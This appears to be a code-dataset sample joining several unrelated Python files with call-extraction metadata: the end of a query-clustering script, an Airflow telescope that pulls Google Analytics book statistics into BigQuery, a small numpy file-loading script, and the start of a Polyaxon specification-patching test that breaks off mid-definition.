f.write('{}.{}\t{}\n'.format(element.split('.')[0], i, element))
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-i', '--input_dir', help='Dataset directory, containing the topics.txt and results.txt files.')
parser.add_argument('-o', '--output_file', help='Output file name (if need be with an *existing* directory).', default="output.txt")
parser.add_argument('-t', '--overlap_threshold', type=float, help='The overlap threshold of the clustering algorithm (ignored if -b specified).', default=0.02)
parser.add_argument('-b', '--baseline', help='Produces the simplified system output, with overlap threshold = 0 and a TreeTagger file from the input directory.', action="store_true")
args = parser.parse_args()
queries = bag_of_wording.extract_queries(args.input_dir + "/topics.txt")
if args.baseline:
bows = bag_of_wording.extract_bow_treetagger(queries, args.input_dir + "/tagged.txt")
overlap_threshold = 0
else:
bows = bag_of_wording.extract_bow(queries, args.input_dir + "/results.txt")
overlap_threshold = args.overlap_threshold
final_clustering = []
for clustering in word_overlap_clustering(queries, bows, overlap_threshold):
clustering_for_query = []
for cl in clustering:
if not isinstance(cl, str):
clustering_for_query.append(list(flatten(cl)))
final_clustering.append(clustering_for_query)
write_output(final_clustering, args.output_file)
|
[
"bag_of_wording.extract_queries",
"bag_of_wording.extract_bow_treetagger",
"argparse.ArgumentParser",
"bag_of_wording.extract_bow"
] |
[((2498, 2577), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), '(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n', (2521, 2577), False, 'import argparse\n'), ((3247, 3309), 'bag_of_wording.extract_queries', 'bag_of_wording.extract_queries', (["(args.input_dir + '/topics.txt')"], {}), "(args.input_dir + '/topics.txt')\n", (3277, 3309), False, 'import bag_of_wording\n'), ((3347, 3425), 'bag_of_wording.extract_bow_treetagger', 'bag_of_wording.extract_bow_treetagger', (['queries', "(args.input_dir + '/tagged.txt')"], {}), "(queries, args.input_dir + '/tagged.txt')\n", (3384, 3425), False, 'import bag_of_wording\n'), ((3481, 3549), 'bag_of_wording.extract_bow', 'bag_of_wording.extract_bow', (['queries', "(args.input_dir + '/results.txt')"], {}), "(queries, args.input_dir + '/results.txt')\n", (3507, 3549), False, 'import bag_of_wording\n')]
|
# Copyright 2020 Curtin University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: <NAME>
from __future__ import annotations
import logging
import os
from datetime import timedelta
from typing import Dict, List, Optional, Tuple
import pendulum
from airflow.exceptions import AirflowException, AirflowSkipException
from airflow.hooks.base import BaseHook
from google.cloud import bigquery
from googleapiclient.discovery import Resource, build
from oauth2client.service_account import ServiceAccountCredentials
from observatory.api.client.model.organisation import Organisation
from oaebu_workflows.config import schema_folder as default_schema_folder
from observatory.platform.utils.airflow_utils import AirflowConns, AirflowVars
from observatory.platform.utils.file_utils import list_to_jsonl_gz
from observatory.platform.utils.workflow_utils import add_partition_date, make_dag_id
from observatory.platform.workflows.organisation_telescope import OrganisationRelease, OrganisationTelescope
class GoogleAnalyticsRelease(OrganisationRelease):
def __init__(
self, dag_id: str, start_date: pendulum.DateTime, end_date: pendulum.DateTime, organisation: Organisation
):
"""Construct a GoogleAnalyticsRelease.
:param dag_id: the id of the DAG.
:param start_date: the start date of the download period.
:param end_date: the end date of the download period, also used as release date for BigQuery table and
file paths
:param organisation: the Organisation of which data is processed.
"""
self.dag_id_prefix = GoogleAnalyticsTelescope.DAG_ID_PREFIX
transform_files_regex = f"{self.dag_id_prefix}.jsonl.gz"
super().__init__(
dag_id=dag_id, release_date=end_date, organisation=organisation, transform_files_regex=transform_files_regex
)
self.start_date = start_date
self.end_date = end_date
@property
def transform_path(self) -> str:
"""Get the path to the transformed file.
:return: the file path.
"""
return os.path.join(self.transform_folder, f"{self.dag_id_prefix}.jsonl.gz")
def download_transform(self, view_id: str, pagepath_regex: str) -> bool:
"""Downloads and transforms an individual Google Analytics release.
:param view_id: The view id.
:param pagepath_regex: The regex expression for the pagepath of a book.
:return: True when data available for period, False if no data is available
"""
service = initialize_analyticsreporting()
results = get_reports(service, self.organisation.name, view_id, pagepath_regex, self.start_date, self.end_date)
results = add_partition_date(results, self.release_date, bigquery.TimePartitioningType.MONTH)
if results:
list_to_jsonl_gz(self.transform_path, results)
return True
else:
if (pendulum.today("UTC") - self.end_date).in_months() >= 26:
logging.info(
"No data available. Google Analytics data is only available for 26 months, see "
"https://support.google.com/analytics/answer/7667196?hl=en for more info"
)
return False
class GoogleAnalyticsTelescope(OrganisationTelescope):
"""Google Analytics Telescope."""
DAG_ID_PREFIX = "google_analytics"
ANU_ORG_NAME = "ANU Press"
def __init__(
self,
organisation: Organisation,
view_id: str,
pagepath_regex: str,
dag_id: Optional[str] = None,
start_date: pendulum.DateTime = pendulum.datetime(2018, 1, 1),
schedule_interval: str = "@monthly",
dataset_id: str = "google",
schema_folder: str = default_schema_folder(),
catchup: bool = True,
airflow_vars=None,
airflow_conns=None,
schema_prefix: str = "",
):
"""Construct a GoogleAnalyticsTelescope instance.
:param organisation: the Organisation of which data is processed.
:param view_id: the view ID, obtained from the 'extra' info from the API regarding the telescope.
:param pagepath_regex: the pagepath regex expression, obtained from the 'extra' info from the
API regarding the telescope.
:param dag_id: the id of the DAG, by default this is automatically generated based on the DAG_ID_PREFIX and the
organisation name.
:param start_date: the start date of the DAG.
:param schedule_interval: the schedule interval of the DAG.
:param schema_folder: the SQL schema path.
:param catchup: whether to catchup the DAG or not.
:param airflow_vars: list of airflow variable keys, for each variable it is checked if it exists in airflow
:param schema_prefix: the prefix used to find the schema path.
"""
if airflow_vars is None:
airflow_vars = [
AirflowVars.DATA_PATH,
AirflowVars.PROJECT_ID,
AirflowVars.DATA_LOCATION,
AirflowVars.DOWNLOAD_BUCKET,
AirflowVars.TRANSFORM_BUCKET,
]
if airflow_conns is None:
airflow_conns = [AirflowConns.OAEBU_SERVICE_ACCOUNT]
if dag_id is None:
dag_id = make_dag_id(self.DAG_ID_PREFIX, organisation.name)
# set schema prefix to 'anu_press' for ANU press, custom dimensions are added in this schema.
if schema_prefix == "":
schema_prefix = "anu_press_" if organisation.name == self.ANU_ORG_NAME else ""
super().__init__(
organisation,
dag_id,
start_date,
schedule_interval,
dataset_id,
schema_folder,
catchup=catchup,
airflow_vars=airflow_vars,
airflow_conns=airflow_conns,
schema_prefix=schema_prefix,
)
self.view_id = view_id
self.pagepath_regex = pagepath_regex
self.add_setup_task_chain([self.check_dependencies])
self.add_task_chain([self.download_transform, self.upload_transformed, self.bq_load_partition, self.cleanup])
def make_release(self, **kwargs) -> List[GoogleAnalyticsRelease]:
"""Make release instances. The release is passed as an argument to the function (TelescopeFunction) that is
called in 'task_callable'.
:param kwargs: the context passed from the PythonOperator. See
https://airflow.apache.org/docs/stable/macros-ref.html for a list of the keyword arguments that are
passed to this argument.
:return: A list of grid release instances
"""
# Get start and end date (end_date = release_date)
start_date = kwargs["execution_date"]
end_date = kwargs["next_execution_date"] - timedelta(days=1)
logging.info(f"Start date: {start_date}, end date:{end_date}, release date: {end_date}")
releases = [GoogleAnalyticsRelease(self.dag_id, start_date, end_date, self.organisation)]
return releases
def check_dependencies(self, **kwargs) -> bool:
"""Check dependencies of DAG. Add to parent method to additionally check for a view id and pagepath regex
:return: True if dependencies are valid.
"""
super().check_dependencies()
if self.view_id is None or self.pagepath_regex is None:
expected_extra = {"view_id": "the_view_id", "pagepath_regex": r"pagepath_regex"}
raise AirflowException(
f"View ID and/or pagepath regex is not set in 'extra' of telescope, extra example: " f"{expected_extra}"
)
return True
def download_transform(self, releases: List[GoogleAnalyticsRelease], **kwargs):
"""Task to download and transform the google analytics release for a given month.
:param releases: a list with one google analytics release.
:return: None.
"""
results = releases[0].download_transform(self.view_id, self.pagepath_regex)
if not results:
raise AirflowSkipException("No Google Analytics data available to download.")
def initialize_analyticsreporting() -> Resource:
"""Initializes an Analytics Reporting API V4 service object.
:return: An authorized Analytics Reporting API V4 service object.
"""
oaebu_account_conn = BaseHook.get_connection(AirflowConns.OAEBU_SERVICE_ACCOUNT)
scopes = ["https://www.googleapis.com/auth/analytics.readonly"]
creds = ServiceAccountCredentials.from_json_keyfile_dict(oaebu_account_conn.extra_dejson, scopes=scopes)
# Build the service object.
service = build("analyticsreporting", "v4", credentials=creds, cache_discovery=False)
return service
def list_all_books(
service: Resource,
view_id: str,
pagepath_regex: str,
start_date: pendulum.DateTime,
end_date: pendulum.DateTime,
organisation_name: str,
) -> Tuple[List[dict], list]:
"""List all available books by getting all pagepaths of a view id in a given period.
:param service: The Google Analytics Reporting service object.
:param view_id: The view id.
:param pagepath_regex: The regex expression for the pagepath of a book.
:param start_date: Start date of analytics period
:param end_date: End date of analytics period
:param organisation_name: The organisation name.
:return: A list with dictionaries, one for each book entry (the dict contains the pagepath, title and average time
on page) and a list of all pagepaths.
"""
# Get pagepath, pagetitle and average time on page for each path
body = {
"reportRequests": [
{
"viewId": view_id,
"pageSize": 10000,
"dateRanges": [
{
"startDate": start_date.strftime("%Y-%m-%d"),
"endDate": end_date.strftime("%Y-%m-%d"),
}
],
"metrics": [{"expression": "ga:avgTimeOnPage"}],
"dimensions": [{"name": "ga:pagepath"}, {"name": "ga:pageTitle"}],
"dimensionFilterClauses": [
{
"operator": "AND",
"filters": [
{"dimensionName": "ga:pagepath", "operator": "REGEXP", "expressions": [pagepath_regex]}
],
}
],
}
]
}
# add all 6 custom dimensions for anu press
if organisation_name == GoogleAnalyticsTelescope.ANU_ORG_NAME:
for i in range(1, 7):
body["reportRequests"][0]["dimensions"].append({"name": f"ga:dimension{str(i)}"})
reports = service.reports().batchGet(body=body).execute()
all_book_entries = reports["reports"][0]["data"].get("rows")
next_page_token = reports["reports"][0].get("nextPageToken")
while next_page_token:
body["reportRequests"][0]["pageToken"] = next_page_token
reports = service.reports().batchGet(body=body).execute()
book_entries = reports["reports"][0]["data"].get("rows")
next_page_token = reports["reports"][0].get("nextPageToken")
all_book_entries += book_entries
# create list with just pagepaths
if all_book_entries:
pagepaths = [path["dimensions"][0] for path in all_book_entries]
else:
pagepaths = []
return all_book_entries, pagepaths
def create_book_result_dicts(
book_entries: List[dict], start_date: pendulum.DateTime, end_date: pendulum.DateTime, organisation_name: str
) -> Dict[dict]:
"""Create a dictionary to store results for a single book. Pagepath, title and avg time on page are already given.
The other metrics will be added to the dictionary later.
:param book_entries: List with dictionaries of book entries.
:param start_date: Start date of analytics period.
:param end_date: End date of analytics period.
:param organisation_name: The organisation name.
:return: Dict to store results
"""
book_results = {}
for entry in book_entries:
pagepath = entry["dimensions"][0]
pagetitle = entry["dimensions"][1]
average_time = float(entry["metrics"][0]["values"][0])
book_result = {
"url": pagepath,
"title": pagetitle,
"start_date": start_date.strftime("%Y-%m-%d"),
"end_date": end_date.strftime("%Y-%m-%d"),
"average_time": average_time,
"unique_views": {"country": {}, "referrer": {}, "social_network": {}},
"sessions": {"country": {}, "source": {}},
}
# add custom dimension data for ANU Press
if organisation_name == GoogleAnalyticsTelescope.ANU_ORG_NAME:
# matches dimension order in 'list_all_books'
custom_dimensions = {
"publication_id": entry["dimensions"][2],
"publication_type": entry["dimensions"][3],
"publication_imprint": entry["dimensions"][4],
"publication_group": entry["dimensions"][5],
"publication_whole_or_part": entry["dimensions"][6],
"publication_format": entry["dimensions"][7],
}
book_result = dict(book_result, **custom_dimensions)
book_results[pagepath] = book_result
return book_results
def get_dimension_data(
service: Resource,
view_id: str,
start_date: pendulum.DateTime,
end_date: pendulum.DateTime,
metrics: list,
dimension: dict,
pagepaths: list,
) -> list:
"""Get reports data from the Google Analytics Reporting service for a single dimension and multiple metrics.
The results are filtered by pagepaths of interest and ordered by pagepath as well.
:param service: The Google Analytics Reporting service.
:param view_id: The view id.
:param start_date: The start date of the analytics period.
:param end_date: The end date of the analytics period.
:param metrics: List with dictionaries of metric.
:param dimension: The dimension.
:param pagepaths: List with pagepaths to filter and sort on.
:return: List with reports data for dimension and metrics.
"""
body = {
"reportRequests": [
{
"viewId": view_id,
"pageSize": 10000,
"dateRanges": [
{
"startDate": start_date.strftime("%Y-%m-%d"),
"endDate": end_date.strftime("%Y-%m-%d"),
}
],
"metrics": metrics,
"dimensions": [{"name": "ga:pagePath"}, dimension],
"dimensionFilterClauses": [
{"filters": [{"dimensionName": "ga:pagePath", "operator": "IN_LIST", "expressions": pagepaths}]}
],
"orderBys": [{"fieldName": "ga:pagepath"}],
}
]
}
reports = service.reports().batchGet(body=body).execute()
all_dimension_data = reports["reports"][0]["data"].get("rows")
next_page_token = reports["reports"][0].get("nextPageToken")
while next_page_token:
body["reportRequests"][0]["pageToken"] = next_page_token
reports = service.reports().batchGet(body=body).execute()
dimension_data = reports["reports"][0]["data"].get("rows")
next_page_token = reports["reports"][0].get("nextPageToken")
all_dimension_data += dimension_data
return all_dimension_data
def add_to_book_result_dict(book_results: dict, dimension: dict, pagepath: str, unique_views: dict, sessions: dict):
"""Add the 'unique_views' and 'sessions' results to the book results dict if these metrics are of interest for the
current dimension.
:param book_results: A dictionary with all book results.
:param dimension: Current dimension for which 'unique_views' and 'sessions' data is given.
:param pagepath: Pagepath of the book.
:param unique_views: Number of unique views for the pagepath&dimension
:param sessions: Number of sessions for the pagepath&dimension
:return: None
"""
# map the dimension name to the field name in BigQuery. The ga:dimensionX are obtained from custom ANU press
# dimensions
mapping = {
"ga:country": "country",
"ga:fullReferrer": "referrer",
"ga:socialNetwork": "social_network",
"ga:source": "source",
}
column_name = mapping[dimension["name"]]
if column_name in ["country", "referrer", "social_network"]:
book_results[pagepath]["unique_views"][column_name] = unique_views
if column_name in ["country", "source"]:
book_results[pagepath]["sessions"][column_name] = sessions
def get_reports(
service: Resource,
organisation_name: str,
view_id: str,
pagepath_regex: str,
start_date: pendulum.DateTime,
end_date: pendulum.DateTime,
) -> list:
"""Get reports data from the Google Analytics Reporting API.
:param service: The Google Analytics Reporting service.
:param organisation_name: Name of the organisation.
:param view_id: The view id.
:param pagepath_regex: The regex expression for the pagepath of a book.
:param start_date: Start date of analytics period
:param end_date: End date of analytics period
:return: List with google analytics data for each book
"""
# list all books
book_entries, pagepaths = list_all_books(service, view_id, pagepath_regex, start_date, end_date, organisation_name)
# if no books in period return empty list and raise airflow skip exception
if not book_entries:
return []
# create dict with dict for each book to store results
book_results = create_book_result_dicts(book_entries, start_date, end_date, organisation_name)
metric_names = ["uniquePageviews", "sessions"]
metrics = [{"expression": f"ga:{metric}"} for metric in metric_names]
dimension_names = ["country", "fullReferrer", "socialNetwork", "source"]
dimensions = [{"name": f"ga:{dimension}"} for dimension in dimension_names]
# get data per dimension
for dimension in dimensions:
dimension_data = get_dimension_data(service, view_id, start_date, end_date, metrics, dimension, pagepaths)
prev_pagepath = None
unique_views = {}
sessions = {}
# entry is combination of book pagepath & dimension
for entry in dimension_data:
pagepath = entry["dimensions"][0]
dimension_value = entry["dimensions"][1] # e.g. 'Australia' for 'country' dimension
if prev_pagepath and pagepath != prev_pagepath:
add_to_book_result_dict(book_results, dimension, prev_pagepath, unique_views, sessions)
unique_views = {}
sessions = {}
# add values if they are not 0
views_metric = int(entry["metrics"][0]["values"][0])
sessions_metric = int(entry["metrics"][0]["values"][1])
if views_metric > 0:
unique_views[dimension_value] = views_metric
if sessions_metric > 0:
sessions[dimension_value] = sessions_metric
prev_pagepath = pagepath
else:
add_to_book_result_dict(book_results, dimension, prev_pagepath, unique_views, sessions)
# transform nested dict to list of dicts
for book, result in book_results.items():
for field, value in result.items():
# field is 'unique_views' or 'sessions'
if isinstance(value, dict):
# nested_field is 'country', 'referrer' or 'social_network'
for nested_field, nested_value in value.items():
values = []
# k is e.g. 'Australia', v is e.g. 1
for k, v in nested_value.items():
values.append({"name": k, "value": v})
book_results[book][field][nested_field] = values
# convert dict to list of results
book_results = [book_results[k] for k in book_results]
return book_results
|
[
"observatory.platform.utils.workflow_utils.make_dag_id",
"observatory.platform.utils.file_utils.list_to_jsonl_gz",
"os.path.join",
"airflow.hooks.base.BaseHook.get_connection",
"pendulum.datetime",
"logging.info",
"datetime.timedelta",
"airflow.exceptions.AirflowException",
"airflow.exceptions.AirflowSkipException",
"pendulum.today",
"oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_dict",
"observatory.platform.utils.workflow_utils.add_partition_date",
"googleapiclient.discovery.build",
"oaebu_workflows.config.schema_folder"
] |
[((8880, 8939), 'airflow.hooks.base.BaseHook.get_connection', 'BaseHook.get_connection', (['AirflowConns.OAEBU_SERVICE_ACCOUNT'], {}), '(AirflowConns.OAEBU_SERVICE_ACCOUNT)\n', (8903, 8939), False, 'from airflow.hooks.base import BaseHook\n'), ((9021, 9122), 'oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_dict', 'ServiceAccountCredentials.from_json_keyfile_dict', (['oaebu_account_conn.extra_dejson'], {'scopes': 'scopes'}), '(oaebu_account_conn.\n extra_dejson, scopes=scopes)\n', (9069, 9122), False, 'from oauth2client.service_account import ServiceAccountCredentials\n'), ((9165, 9240), 'googleapiclient.discovery.build', 'build', (['"""analyticsreporting"""', '"""v4"""'], {'credentials': 'creds', 'cache_discovery': '(False)'}), "('analyticsreporting', 'v4', credentials=creds, cache_discovery=False)\n", (9170, 9240), False, 'from googleapiclient.discovery import Resource, build\n'), ((2588, 2657), 'os.path.join', 'os.path.join', (['self.transform_folder', 'f"""{self.dag_id_prefix}.jsonl.gz"""'], {}), "(self.transform_folder, f'{self.dag_id_prefix}.jsonl.gz')\n", (2600, 2657), False, 'import os\n'), ((3215, 3303), 'observatory.platform.utils.workflow_utils.add_partition_date', 'add_partition_date', (['results', 'self.release_date', 'bigquery.TimePartitioningType.MONTH'], {}), '(results, self.release_date, bigquery.\n TimePartitioningType.MONTH)\n', (3233, 3303), False, 'from observatory.platform.utils.workflow_utils import add_partition_date, make_dag_id\n'), ((4122, 4151), 'pendulum.datetime', 'pendulum.datetime', (['(2018)', '(1)', '(1)'], {}), '(2018, 1, 1)\n', (4139, 4151), False, 'import pendulum\n'), ((4263, 4286), 'oaebu_workflows.config.schema_folder', 'default_schema_folder', ([], {}), '()\n', (4284, 4286), True, 'from oaebu_workflows.config import schema_folder as default_schema_folder\n'), ((7359, 7452), 'logging.info', 'logging.info', (['f"""Start date: {start_date}, end date:{end_date}, release date: {end_date}"""'], {}), "(\n f'Start date: {start_date}, end date:{end_date}, release date: {end_date}')\n", (7371, 7452), False, 'import logging\n'), ((3331, 3377), 'observatory.platform.utils.file_utils.list_to_jsonl_gz', 'list_to_jsonl_gz', (['self.transform_path', 'results'], {}), '(self.transform_path, results)\n', (3347, 3377), False, 'from observatory.platform.utils.file_utils import list_to_jsonl_gz\n'), ((5806, 5856), 'observatory.platform.utils.workflow_utils.make_dag_id', 'make_dag_id', (['self.DAG_ID_PREFIX', 'organisation.name'], {}), '(self.DAG_ID_PREFIX, organisation.name)\n', (5817, 5856), False, 'from observatory.platform.utils.workflow_utils import add_partition_date, make_dag_id\n'), ((7332, 7349), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (7341, 7349), False, 'from datetime import timedelta\n'), ((8012, 8140), 'airflow.exceptions.AirflowException', 'AirflowException', (['f"""View ID and/or pagepath regex is not set in \'extra\' of telescope, extra example: {expected_extra}"""'], {}), '(\n f"View ID and/or pagepath regex is not set in \'extra\' of telescope, extra example: {expected_extra}"\n )\n', (8028, 8140), False, 'from airflow.exceptions import AirflowException, AirflowSkipException\n'), ((8589, 8660), 'airflow.exceptions.AirflowSkipException', 'AirflowSkipException', (['"""No Google Analytics data available to download."""'], {}), "('No Google Analytics data available to download.')\n", (8609, 8660), False, 'from airflow.exceptions import AirflowException, AirflowSkipException\n'), ((3506, 3681), 'logging.info', 'logging.info', (['"""No data available. Google Analytics data is only available for 26 months, see https://support.google.com/analytics/answer/7667196?hl=en for more info"""'], {}), "(\n 'No data available. Google Analytics data is only available for 26 months, see https://support.google.com/analytics/answer/7667196?hl=en for more info'\n )\n", (3518, 3681), False, 'import logging\n'), ((3432, 3453), 'pendulum.today', 'pendulum.today', (['"""UTC"""'], {}), "('UTC')\n", (3446, 3453), False, 'import pendulum\n')]
|
import numpy as np
test=np.load('/home/ubuntu/hzy/pythia/data/m4c_textvqa_ocr_en_frcn_features/train_images/f441f29812b385ad_info.npy',encoding = "latin1",allow_pickle=True) #加载文件
doc = open('contrast9.txt', 'a') #打开一个存储文件,并依次写入
print(test, file=doc) #将打印内容写入文件中
|
[
"numpy.load"
] |
[((24, 183), 'numpy.load', 'np.load', (['"""/home/ubuntu/hzy/pythia/data/m4c_textvqa_ocr_en_frcn_features/train_images/f441f29812b385ad_info.npy"""'], {'encoding': '"""latin1"""', 'allow_pickle': '(True)'}), "(\n '/home/ubuntu/hzy/pythia/data/m4c_textvqa_ocr_en_frcn_features/train_images/f441f29812b385ad_info.npy'\n , encoding='latin1', allow_pickle=True)\n", (31, 183), True, 'import numpy as np\n')]
|
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from polyaxon import pkg, types
from polyaxon.config_reader.utils import deep_update
from polyaxon.containers.names import MAIN_JOB_CONTAINER
from polyaxon.polyaxonfile import OperationSpecification
from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind
from polyaxon.schemas.patch_strategy import V1PatchStrategy
from polyaxon.utils.tz_utils import now
from tests.utils import BaseTestCase
@pytest.mark.polyaxonfile_mark
class TestPatchSpecifications(BaseTestCase):
DEFAULT_INT_VALUE = 2
DEFAULT_DT_VALUE = now().isoformat()
DEFAULT_STR_VALUE = "test"
PATCH_INT_VALUE = 13
PATCH_DT_VALUE = now().isoformat()
PATCH_STR_VALUE = "patch"
def get_empty_operation(self):
return OperationSpecification.read(
{"version": pkg.SCHEMA_VERSION, "hubRef": "test"}
)
def get_full_operation(self):
return OperationSpecification.read(
{
"version": pkg.SCHEMA_VERSION,
"name": self.DEFAULT_STR_VALUE,
"description": self.DEFAULT_STR_VALUE,
"tags": [
"{}1".format(self.DEFAULT_STR_VALUE),
"{}2".format(self.DEFAULT_STR_VALUE),
],
"presets": [self.DEFAULT_STR_VALUE],
"queue": "{}/{}".format(self.DEFAULT_STR_VALUE, self.DEFAULT_STR_VALUE),
"cache": {
"disable": False,
"ttl": self.DEFAULT_INT_VALUE,
},
"termination": {
"maxRetries": self.DEFAULT_INT_VALUE,
"ttl": self.DEFAULT_INT_VALUE,
"timeout": self.DEFAULT_INT_VALUE,
},
"plugins": {
"auth": False,
"shm": False,
"collectLogs": False,
"collectArtifacts": False,
"collectResources": False,
},
"build": {
"params": {
"patch-key1": {"value": "{}2".format(self.DEFAULT_STR_VALUE)},
"patch-key2": {"value": "{}1".format(self.DEFAULT_STR_VALUE)},
},
"runPatch": {
"init": [
{
"connection": self.DEFAULT_STR_VALUE,
"git": {"revision": self.DEFAULT_STR_VALUE},
}
],
},
"hubRef": self.DEFAULT_STR_VALUE,
},
"hooks": [
{
"hubRef": "{}1".format(self.DEFAULT_STR_VALUE),
"trigger": "succeeded",
"connection": "{}1".format(self.DEFAULT_STR_VALUE),
},
{
"connection": "{}2".format(self.DEFAULT_STR_VALUE),
"hubRef": "{}2".format(self.DEFAULT_STR_VALUE),
},
],
"params": {
"patch-key1": {"value": "{}2".format(self.DEFAULT_STR_VALUE)},
"patch-key2": {"value": "{}1".format(self.DEFAULT_STR_VALUE)},
},
"runPatch": {
"init": [
{
"connection": self.DEFAULT_STR_VALUE,
"git": {"revision": self.DEFAULT_STR_VALUE},
}
],
"connections": [
"{}1".format(self.DEFAULT_STR_VALUE),
"{}2".format(self.DEFAULT_STR_VALUE),
],
"container": {
"resources": {"requests": {"cpu": self.DEFAULT_INT_VALUE}}
},
"environment": {
"nodeSelector": {"polyaxon": "core"},
"serviceAccountName": self.DEFAULT_STR_VALUE,
"imagePullSecrets": [
"{}1".format(self.DEFAULT_STR_VALUE),
"{}2".format(self.DEFAULT_STR_VALUE),
],
},
},
"schedule": {
"kind": "cron",
"cron": "0 0 * * *",
"startAt": self.DEFAULT_DT_VALUE,
"endAt": self.DEFAULT_DT_VALUE,
},
"events": [
{
"kinds": [V1EventKind.RUN_STATUS_SCHEDULED],
"ref": "{}1".format(self.DEFAULT_STR_VALUE),
},
{
"kinds": [V1EventKind.RUN_STATUS_SCHEDULED],
"ref": "{}2".format(self.DEFAULT_STR_VALUE),
},
],
"joins": [
{
"query": "{}1".format(self.DEFAULT_STR_VALUE),
"sort": "{}1".format(self.DEFAULT_STR_VALUE),
"params": {
"u": {"value": "{}1".format(self.DEFAULT_STR_VALUE)},
},
},
{
"query": "{}2".format(self.DEFAULT_STR_VALUE),
"sort": "{}2".format(self.DEFAULT_STR_VALUE),
"params": {
"v": {
"value": "{}2".format(self.DEFAULT_STR_VALUE),
"contextOnly": True,
},
},
},
],
"matrix": {
"concurrency": self.DEFAULT_INT_VALUE,
"kind": "mapping",
"values": [
{"a": self.DEFAULT_INT_VALUE},
{"b": self.DEFAULT_INT_VALUE},
],
},
"dependencies": [
"{}1".format(self.DEFAULT_STR_VALUE),
"{}2".format(self.DEFAULT_STR_VALUE),
],
"trigger": "all_succeeded",
"conditions": self.DEFAULT_STR_VALUE,
"skipOnUpstreamSkip": True,
"hubRef": self.DEFAULT_STR_VALUE,
}
)
def get_full_operation_with_component(self):
operation = self.get_full_operation()
config_dict = {
"inputs": [{"name": "param1", "type": types.INT}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
operation.component = V1Component.from_dict(config_dict)
return operation
def get_full_preset(self):
return OperationSpecification.read(
{
"version": pkg.SCHEMA_VERSION,
"name": self.PATCH_STR_VALUE,
"isPreset": True,
"description": self.PATCH_STR_VALUE,
"tags": [
"{}1".format(self.PATCH_STR_VALUE),
"{}2".format(self.PATCH_STR_VALUE),
],
"presets": [self.PATCH_STR_VALUE],
"queue": "{}/{}".format(self.PATCH_STR_VALUE, self.PATCH_STR_VALUE),
"cache": {
"disable": True,
"ttl": self.PATCH_INT_VALUE,
},
"termination": {
"maxRetries": self.PATCH_INT_VALUE,
"ttl": self.PATCH_INT_VALUE,
"timeout": self.PATCH_INT_VALUE,
},
"plugins": {
"auth": True,
"shm": True,
"collectLogs": True,
"collectArtifacts": True,
"collectResources": True,
},
"build": {
"params": {
"patch-key1": {"value": "{}2".format(self.PATCH_STR_VALUE)},
"patch-key2": {"value": "{}1".format(self.PATCH_STR_VALUE)},
},
"runPatch": {
"init": [
{
"connection": self.PATCH_STR_VALUE,
"git": {"revision": self.PATCH_STR_VALUE},
}
],
},
"hubRef": self.PATCH_STR_VALUE,
},
"hooks": [
{
"hubRef": "{}1".format(self.PATCH_STR_VALUE),
"trigger": "succeeded",
"connection": "{}1".format(self.PATCH_STR_VALUE),
},
{
"connection": "{}1".format(self.PATCH_STR_VALUE),
"hubRef": "{}2".format(self.PATCH_STR_VALUE),
},
],
"params": {
"patch-key1": {"value": "{}2".format(self.PATCH_STR_VALUE)},
"patch-key2": {"value": "{}1".format(self.PATCH_STR_VALUE)},
},
"runPatch": {
"init": [
{"connection": self.PATCH_STR_VALUE, "git": {"revision": "dev"}}
],
"connections": [
"{}1".format(self.PATCH_STR_VALUE),
"{}2".format(self.PATCH_STR_VALUE),
],
"container": {
"resources": {
"requests": {
"cpu": self.PATCH_INT_VALUE,
"memory": self.PATCH_INT_VALUE,
}
}
},
"environment": {
"nodeSelector": {"polyaxon-patch": "core"},
"serviceAccountName": self.PATCH_STR_VALUE,
"imagePullSecrets": [
"{}1".format(self.PATCH_STR_VALUE),
"{}2".format(self.PATCH_STR_VALUE),
],
},
},
"schedule": {"kind": "datetime", "startAt": self.PATCH_DT_VALUE},
"events": [
{
"kinds": [V1EventKind.RUN_STATUS_DONE],
"ref": self.PATCH_STR_VALUE,
},
{
"kinds": [V1EventKind.RUN_STATUS_DONE],
"ref": self.PATCH_STR_VALUE,
},
],
"joins": [
{
"query": self.PATCH_STR_VALUE,
"sort": self.PATCH_STR_VALUE,
"params": {
"u": {"value": self.PATCH_STR_VALUE},
},
},
{
"query": self.PATCH_STR_VALUE,
"sort": self.PATCH_STR_VALUE,
"params": {
"x": {"value": self.PATCH_STR_VALUE, "contextOnly": True},
},
},
],
"matrix": {
"concurrency": self.PATCH_INT_VALUE,
"kind": "mapping",
"values": [
{"a": self.PATCH_INT_VALUE},
{"c": self.PATCH_INT_VALUE},
],
},
"dependencies": [
"{}1".format(self.PATCH_STR_VALUE),
"{}2".format(self.PATCH_STR_VALUE),
],
"trigger": "all_succeeded",
"conditions": "",
"skipOnUpstreamSkip": True,
}
)
def get_empty_preset(self):
return OperationSpecification.read(
{
"version": pkg.SCHEMA_VERSION,
"name": None,
"isPreset": True,
"description": "",
"tags": [],
"presets": [],
"queue": "",
"cache": {},
"termination": {},
"plugins": {},
"build": None,
"hooks": [],
"params": {},
"runPatch": {
"init": [],
"connections": [],
"container": {},
"environment": {
"nodeSelector": {},
"serviceAccountName": "",
"imagePullSecrets": [],
},
},
"schedule": None,
"events": [],
"joins": [],
